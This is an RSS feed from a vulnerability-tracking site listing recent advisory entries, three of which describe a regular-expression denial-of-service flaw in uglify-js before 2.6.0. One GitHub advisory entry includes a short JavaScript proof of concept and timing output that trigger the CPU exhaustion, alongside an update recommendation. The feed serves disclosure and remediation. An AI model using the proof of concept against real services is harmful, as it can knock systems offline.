<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 03 Oct 2026 20:31:54 +0000</lastBuildDate>
    <item>
      <title>bdu:2021-02855</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2021-02855</link>
      <description>bdu:2021-02855</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2021-02855</guid>
    </item>
    <item>
      <title>cnvd-2016-02551</title>
      <link>https://cve.radiocsirt.org/vuln/cnvd-2016-02551</link>
      <description>cnvd-2016-02551</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/cnvd-2016-02551</guid>
    </item>
    <item>
      <title>EUVD-2026-96030</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-96030</link>
      <description>EUVD-2026-96030</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-96030</guid>
    </item>
    <item>
      <title>fkie_cve-2015-8858</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2015-8858</link>
      <description>&lt;p&gt;The uglify-js package before 2.6.0 for Node.js allows attackers to cause a denial of service (CPU consumption) via crafted input in a parse call, aka a &amp;#34;regular expression denial of service (ReDoS).&amp;#34;&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;The uglify-js package before 2.6.0 for Node.js allows attackers to cause a denial of service (CPU consumption) via crafted input in a parse call, aka a &amp;#34;regular expression denial of service (ReDoS).&amp;#34;&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2015-8858</guid>
    </item>
    <item>
      <title>GHSA-c9f4-xj24-8jqx — Regular Expression Denial of Service in uglify-js</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-c9f4-xj24-8jqx</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: uglify-js&lt;/p&gt;
&lt;p&gt;Versions of `uglify-js` prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the `parse()` method.&lt;/p&gt;
&lt;p&gt;### Proof of Concept&lt;/p&gt;
&lt;p&gt;```
var u = require(&amp;#39;uglify-js&amp;#39;);
var genstr = function (len, chr) {
    var result = &amp;#34;&amp;#34;;
    for (i=0; i&amp;lt;=len; i++) {
        result = result + chr;
    }&lt;/p&gt;
&lt;p&gt;return result;
}&lt;/p&gt;
&lt;p&gt;u.parse(&amp;#34;var a = &amp;#34; + genstr(process.argv[2], &amp;#34;1&amp;#34;) + &amp;#34;.1ee7;&amp;#34;);
```&lt;/p&gt;
&lt;p&gt;### Results
```
$ time node test.js 10000
real	0m1.091s
user	0m1.047s
sys	0m0.039s&lt;/p&gt;
&lt;p&gt;$ time node test.js 80000
real	0m6.486s
user	0m6.229s
sys	0m0.094s
```&lt;/p&gt;
&lt;p&gt;## Recommendation&lt;/p&gt;
&lt;p&gt;Update to version 2.6.0 or later.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: uglify-js&lt;/p&gt;
&lt;p&gt;Versions of `uglify-js` prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the `parse()` method.&lt;/p&gt;
&lt;p&gt;### Proof of Concept&lt;/p&gt;
&lt;p&gt;```
var u = require(&amp;#39;uglify-js&amp;#39;);
var genstr = function (len, chr) {
    var result = &amp;#34;&amp;#34;;
    for (i=0; i&amp;lt;=len; i++) {
        result = result + chr;
    }&lt;/p&gt;
&lt;p&gt;return result;
}&lt;/p&gt;
&lt;p&gt;u.parse(&amp;#34;var a = &amp;#34; + genstr(process.argv[2], &amp;#34;1&amp;#34;) + &amp;#34;.1ee7;&amp;#34;);
```&lt;/p&gt;
&lt;p&gt;### Results
```
$ time node test.js 10000
real	0m1.091s
user	0m1.047s
sys	0m0.039s&lt;/p&gt;
&lt;p&gt;$ time node test.js 80000
real	0m6.486s
user	0m6.229s
sys	0m0.094s
```&lt;/p&gt;
&lt;p&gt;## Recommendation&lt;/p&gt;
&lt;p&gt;Update to version 2.6.0 or later.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-c9f4-xj24-8jqx</guid>
    </item>
    <item>
      <title>gsd-2015-8858</title>
      <link>https://cve.radiocsirt.org/vuln/gsd-2015-8858</link>
      <description>gsd-2015-8858</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/gsd-2015-8858</guid>
    </item>
    <item>
      <title>UBUNTU-CVE-2015-8858</title>
      <link>https://cve.radiocsirt.org/vuln/ubuntu-cve-2015-8858</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:16.04:LTS: uglifyjs&lt;/p&gt;
&lt;p&gt;The uglify-js package before 2.6.0 for Node.js allows attackers to cause a denial of service (CPU consumption) via crafted input in a parse call, aka a &amp;#34;regular expression denial of service (ReDoS).&amp;#34;&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:16.04:LTS: uglifyjs&lt;/p&gt;
&lt;p&gt;The uglify-js package before 2.6.0 for Node.js allows attackers to cause a denial of service (CPU consumption) via crafted input in a parse call, aka a &amp;#34;regular expression denial of service (ReDoS).&amp;#34;&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ubuntu-cve-2015-8858</guid>
    </item>
  </channel>
</rss>
